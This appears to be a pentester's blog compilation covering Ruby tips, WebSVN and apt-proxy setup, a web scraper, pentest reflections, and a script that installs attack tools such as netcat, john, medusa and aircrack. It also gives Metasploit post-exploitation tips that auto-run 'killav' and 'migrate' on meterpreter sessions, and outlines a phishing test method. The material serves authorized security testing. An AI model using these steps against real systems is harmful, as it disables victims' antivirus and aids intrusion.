contributing to open source? need to search & understand ruby code faster? This bash function should save you some time. I use it atleast 50-60 times a day.
Stick this in your .bashrc:
function rgrep() {
find -L . -type f -name \*.rb -exec grep -n -i -H --color "$1" {} \;
}
Use like: $ rgrep “something”
Here’s a quick tip for assigning default values with a ruby hash. It’s well publicized that you can set an overall default (i think this is called “default assignment”) for the hash with the .default method like this (stolen directly from the rubydocs):
h = Hash.new #=> {}
h.default #=> nil
h.default(2) #=> nil
h = Hash.new("cat") #=> {}
h.default #=> "cat"
h.default(2) #=> "cat"
h = Hash.new {|h,k| h[k] = k.to_i*10} #=> {}
h.default #=> 0
h.default(2) #=> 20</pre>
But you can also set per-key defaults using the or-operator. if an assigned value is false, or nil, you’ll get the default value. See below:
ruby-1.9.1-p378 > x = {}
=> value: {}
ruby-1.9.1-p378 > x[:y] = "y"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = "y" || "noty"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = nil || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = false || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = "" || "noty"
=> value: ""
… Note that or-assignment doesn’t work in this case:
ruby-1.9.1-p378 > x[:y] = "" ||= "noty" SyntaxError: (irb):19: syntax error, unexpected tOP_ASGN, expecting $end x[:y] = "" ||= "noty" ^ from /home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/irb:17:in `<main>' ruby-1.9.1-p378 >
The only prereqs to this quick howto are that you have an ubuntu box and you know a thing or two about subversion. Preferably a shellhost – I use slicehost and i’ve heard great things about linode.com.
I use svn for many of my projects, and for my toolkit. Tonight i needed to quickly and securely share a few files from that toolkit, so i stuck websvn on a host, and configured htaccess authentication. Total time? 10 min. Here’s the setup.
(Yes, i know the cool kids are all on git now)
cd /var/svn svnadmin create repository
$apt-get install apache2 websvn
<?php
// please edit /etc/websvn/config.php
// or use dpkg-reconfigure websvn
$config->parentPath("/var/svn/");
$config->addRepository("repository", "file:///var/svn/repository");
$config->setEnscriptPath("/usr/bin");
$config->setSedPath("/bin");
$config->useEnscript();
?>
$htpasswd -c -s /var/svn/htaccess testuser
# Configuration for websvn using php4. Alias /websvn /usr/share/websvn <Directory /usr/share/websvn> DirectoryIndex index.php Options FollowSymLinks Order allow,deny Allow from all AuthType Basic AuthName "Subversion Repository" Require valid-user AuthUserFile /var/svn/htaccess <IfModule mod_php4.c> php_flag magic_quotes_gpc Off php_flag track_vars On </IfModule> </Directory>
$/etc/init.d/apache2 restart
totally half-finished thought. maybe it’ll spawn an idea for you… there’s a zillion+1 ways to scrape information from the web these days. here’s the easiest i’ve found:
require 'nokogiri'
require 'open-uri'
require 'tidy_ffi'
class CrappyScraper
attr_accessor :doc
def search(keyword)
@doc = Nokogiri::HTML(open("http://www.google.com/search?q=" + keyword))
@doc.xpath('//h3/a').each do |node|
puts node.text
end
end
def scrape(url)
@doc = Nokogiri::HTML(open(url))
@doc.xpath('//span/a').each do |node|
puts node.text
end
end
def write_clean(filename)
File.open(filename, 'w') do |f|
doc_clean = TidyFFI::Tidy.new(@doc.to_s).clean
f.write(doc_clean)
end
end
def to_s
TidyFFI::Tidy.new(@doc.to_s).clean
end
def write(filename)
File.open(filename, 'w') { |f| f.write(@doc) }
end
end
x = CrappyScraper.new
x.search('cowabunga')
puts x.to_s
No big secret that i’m a huge fan of ubuntu as a pentesting platform, and run it as my main OS. Recently I’ve had enough systems to justify tossing in an apt-proxy installation. Nothing groundbreaking, but may save a few mins for you. Here’re my notes.
SERVER CONFIGURATION:
Choose an (ubuntu) machine to install apt-proxy on:
$ sudo apt-get install apt-proxy
After the install, edit the /etc/apt-proxy/apt-proxy-v2.conf file to configure your listening address:
address = [internal listening address]
Restart the apt-proxy daemon:
$ sudo /etc/init.d/apt-proxy restart
That’s it for the server
CLIENT:
Setting a client up to use the proxy requires editing a few lines of your /etc/apt/sources.list. The Apt-proxy howto (https://help.ubuntu.com/community/AptProxy) gives a good example:
Replace mentions of specific repository URL (in /etc/apt/sources.list) with references to your server and the backend for it; such as:
deb http://archive.ubuntu.com/ubuntu karmic main restricted
deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe
would become:
deb http://server:9999/ubuntu karmic main restricted
deb http://server:9999/ubuntu-security karmic-security main restricted universe
Pretty straightforward. Just make sure you append the “-security” piece onto the proxy URL for both security and updates. In the case of my /etc/apt/sources.list:
# standard packages
deb http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse# update packages
deb http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse# security packages
deb http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse
Run an apt-get update / apt-get upgrade and you’re golden. Rinse & repeat for all clients.
Cheers!
A common question that comes up with post-exploitation is the need to run multiple things when a meterpreter session is initiated.
You can easily run a single command using the ‘AutoRunScript’ option. For example:
msf (psexec) > set AutoRunScript killav
However, if you need multiple things to run, there’re a couple multi-runner scripts that you should know about: multiscript, multicommand, and multi_console_command. They can take either a -c or a -rc option, which will provide the list of items to run. These scripts were provided by dark0perator.
Sidenote: If you’re using the multi* scripts, it’s better to use the -rc option. The parsing for the multi-command scripts doesn’t handle spaces well.
msf (psexec) > set AutoRunScript multi_console_command -c ‘command, command, command’ ## Don’t do this
It’s much better to use an external rc file where commands.rc is just a list of commands one-per-line like:
help
run killav
migrate
shutdown
Then call it like:
msf (psexec) > set AutoRunScript multi_console_command -rc commands.rc
Another (non-recommended) trick is to set the InitialAutoRunScript option ie ‘set InitialAutoRunScript killav’ if you only need two scripts to run – but generally InitialAutoRunScript shouldn’t be touched except by exploits. It’s intended for exploits that know the target process is going to die, so they can migrate. <– bad idea (according to egyp7).
I started thinking about some of the findings we make and the recommendations around them – and how unrealistic we’re being as penetration testers. Take ‘Information Leakage’ for instance. How plausible is it to prevent ALL information leakage? Is that something that we should be asking clients to strive for? What about the best use of their time / resources? wouldn’t that time be better spent monitoring for anomalous events, in general?
what about the social engineering findings where we demonstrate that it’s possible to gather internal company usernames, but is there realistically any way to /prevent/ username enumeration? well, yes, but at what cost / effort? Are we really asking folks to prevent their usernames from reaching the outside world — and what are they thinking when they read that?? aren’t we just reporting this as an informational thing (i think so). I mean, we’re calling for PREVENTION here, but what about the other aspects of security? Detection / Reaction? Wouldn’t it make more sense to recommend clients spend those resources monitoring for mass email blasts from an external address, or for anomalous activity on the internal network?
I think there’s an open question here on how to fit detection / reaction testing into penetration-testing in a meaningful way.
I’ll choose to do business with a company that’s put effort into detection and reaction capabilities as opposed to 100% prevention any day.
Phishing is one of those things people either love or hate (A lot of it depends on which side of the water you’re on). That said, the subject of phishing tends to make most admins nervous, as they /know/ their users are going to be susceptible. In my experience, that’s true. However, there’s an awful lot of technical controls that can help prevent phishers from being successful. This methodology was developed to help test those technical controls. It’s a work in progress, but i want to get it out there for your use.
The purpose of this attack methodology is to provide a repeatable way to test a client’s susceptibility to attacks sent over email. The attack methodology progressively increases in cleverness / technical ability of the attack. It aims to test not only the user’s awareness of a social engineering attack, but also the controls which prevent such attacks.
Many security controls are now involved when sending a simple email. A list of some of those controls:
Ways in which we can influence the success of the attack:
Email Sources:
Social Engineering Plausibility (This is a whole subject in its own right):
Payload Types:
(add google analytics to any of these for easy tracking of victims)
Server
Now that you’ve prepared, you can use each server type, to send each payload type.
This shouldn’t make it through.
This will likely make it through.
For a pentest, it’s useful to know as much information about the clients as possible. You also want some way to maintain access.
https://help.ubuntu.com/community/PostfixBasicSetupHowto – Postfix on ubuntu / debian
…And now, a rant.
What should be considered (and reported) as a vulnerability when auditing a network?
Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn’t that a vulnerability? Can we detect it?
What are today’s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?
Isn’t that a vulnerability? (hint – pass-the-hash)
What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?
here’s a recent drop of a script i use to configure my ubuntu box for pentesting. yes, i could use backtrack (and i do — especially if i’m having wireless issues), but this is a quick way to get an ubuntu box up & running. cheers -jcran
</pre> #!/bin/bash # System Configuration & Utilities apt-get -y install build-essential apt-get -y install linux-headers-`uname -r` apt-get -y install sysvconfig apt-get -y install bum ## Boot-Up Manager apt-get -y install tofrodos ## DOS utils apt-get -y install xinetd ## why not. apt-get -y install unrar ## RAR support apt-get -y install p7zip-full ## 7-Zip support apt-get -y install fcrackzip ## Zip cracking apt-get -y install ipcalc ## handy apt-get -y install sharutils ## uuencode / uudecode apt-get -y install xclip ## piping is handy apt-get -y install ldap-utils apt-get -y install cabextract ## damn microsoft and their fascist compression formats! apt-get -y install g++ apt-get -y install ssh ## Network services apt-get -y install samba apt-get -y install nis apt-get -y install nfs apt-get -y install smbfs ## samba utilities ## apt-get -y install tftpd ## you need to modify the /etc/init.d file... # system monitoring apt-get -y install ntop ## apt-get -y install sysstat ## iostat,sar,mpstat apt-get -y install procinfo # Package Management #apt-get -y install apt-build #apt-get -y install apt-dpkg-ref #apt-get -y install apt-listbugs apt-get -y install apt-file #apt-get -y install apt-howto apt-get -y install apt-utils apt-get -y install apt-listchanges apt-get -y install dconf # Terminal Emulators apt-get -y install tn5250 apt-get -y install screen # Filesystem Support apt-get -y install sshfs apt-get -y install ntfs-3g apt-get -y install ntfs-config apt-get -y install ntfsprogs apt-get -y install mkisofs # Gnome-Specific Configuration apt-get -y install gconf apt-get -y install gnomebaker apt-get -y install nautilus-open-terminal # ISAKMPD # apt-get -y install isakmpd apt-get -y install vpnc # Multimedia apt-get -y install amarok apt-get -y install xmms apt-get -y install xmms-skins apt-get -y install xmms-mp4 apt-get -y install mpg123 apt-get -y install totem-xine apt-get -y install ksnapshot apt-get -y install istanbul apt-get -y install recordmydesktop apt-get -y install gtk-recordmydesktop apt-get -y install xvidcap # Basics # Netcat & Tunnelling apt-get -y install netcat apt-get -y install sbd apt-get -y install cryptcat apt-get -y install socat apt-get -y install vtun apt-get -y install stunnel # Scanning Tools apt-get -y install nmap apt-get -y install nessusd apt-get -y install nessus apt-get -y install fping apt-get -y install hping2 apt-get -y install hping3 apt-get -y install scapy apt-get -y install snmp #apt-get -y install sing #send icmp nasty garbage apt-get -y install traceroute apt-get -y install tcptraceroute apt-get -y install ike-scan ## ipsec vpn tool apt-get -y install nbtscan ## cifs info tool apt-get -y install sslscan # Passive Scanning Tools apt-get -y install p0f apt-get -y install pads # Sniffing Tools apt-get -y install wireshark apt-get -y install ettercap apt-get -y install ettercap-gtk apt-get -y install tcpdump apt-get -y install tcpflow apt-get -y install ssldump apt-get -y install nemesis # packet injection apt-get -y install dsniff apt-get -y install etherape # Libraries apt-get -y install libssl #Medusa apt-get -y install libssl-dev #Medusa apt-get -y install libssh-2 #Medusa apt-get -y install python-pycurl #wfuzz apt-get -y install libnet-dns-perl #fierce.pl apt-get -y install libsnmp-perl #?? apt-get -y install libcrypt-ssleay-perl #HEAD,GET,POST, libwhisker apt-get -y install libnet-ssleay-perl # "" "" apt-get -y install ncurses-dev # kismet-newcore apt-get -y install libpcap-dev # kismet-newcore # Cracking Tools apt-get -y install john apt-get -y install medusa ## apt-get -y install hydra? ## not really that useful.. # Wireless Tools ##apt-get -y install kismet ## disabled because of kismet-ng apt-get -y install aircrack apt-get -y install aircrack-ng # App Layer Tools apt-get -y install wget apt-get -y install curl apt-get -y install nikto ## Scripting apt-get -y install ruby apt-get -y install python apt-get -y install perl apt-get -y install perl-doc apt-get -y install gawk apt-get -y install vim-ruby apt-get -y install vim-python ## Ruby - Gems apt-get -y install gems apt-get -y install rubygems ## Metasploit dependencies apt-get -y install libopenssl-ruby apt-get -y install ruby-libglade2 apt-get -y install libgtk2-ruby ## Scapy - Python Dependencies - http://www.secdev.org/projects/scapy/portability.html apt-get -y install graphviz # graph stuff apt-get -y install imagemagick # graph stuff apt-get -y install python-gnuplot # PacketList.plot() apt-get -y install python-crypto # WEP Stuff apt-get -y install python-visual # 3D Stuff apt-get -y install python-pyx # pdfdump() / psdump() apt-get -y install acroread apt-get -y install gv apt-get -y install sox ## ProxyStrike Dependencies apt-get -y install python-qt4 apt-get -y install python-openssl ## W3af Dependencies apt-get -y install python-pyparsing apt-get -y install python-pydot apt-get -y install python-soappy ## Coding ##apt-get -y install eclipse - get the latest version... apt-get -y install kdevelop apt-get -y install subversion apt-get -y install rapidsvn apt-get -y install vim-full apt-get -y install git apt-get -y install git-core ## Documentation apt-get -y install notecase apt-get -y install vim apt-get -y install liferea ## Web / Browser Utilities apt-get -y install azureus apt-get -y install opera apt-get -y install filezilla apt-get -y install flashplugin-nonfree apt-get -y install pidgin apt-get -y install pidgin-otr apt-get -y install thunderbird apt-get -y install lightning-extension apt-get -y install enigmail apt-get -y install irssi apt-get -y install silc apt-get -y install tor ## Windows Stuff apt-get -y install wine apt-get -y install quicksynergy ## Encryption apt-get -y install dmsetup apt-get -y install password-gorilla apt-get -y install gpa apt-get -y install seahorse ## Java apt-get -y install sun-java6-jre apt-get -y install sun-java6-plugin #set our java version to java-6-sun as this plays well with burpsuite update-java-alternatives -s java-6-sun ## Upgrade & Such apt-get update apt-get upgrade apt-get dist-upgrade ## Remove auto-start services update-rc.d -f exim4 remove update-rc.d -f tor remove update-rc.d -f ntop remove update-rc.d -f p0f remove ## not sure this is necessary update-rc.d -f pads remove update-rc.d -f isakmpd remove update-rc.d -f nessusd remove update-rc.d -f cups remove update-rc.d -f samba remove update-rc.d -f nis remove update-rc.d -f nfs-common remove ### Manual installs ### ------------------------------------------------------------------------------------------ ### truecrypt -- http://www.howtogeek.com/howto/ubuntu/install-truecrypt-on-ubuntu-edgy/ ### - you will need the linux kernel source for this one... ### onesixtyone -- http://www.phreedom.org/solar/onesixtyone/ ### libdvdcss2 -- "sudo /usr/share/doc/libdvdread3/./install-css.sh" <pre> <pre>
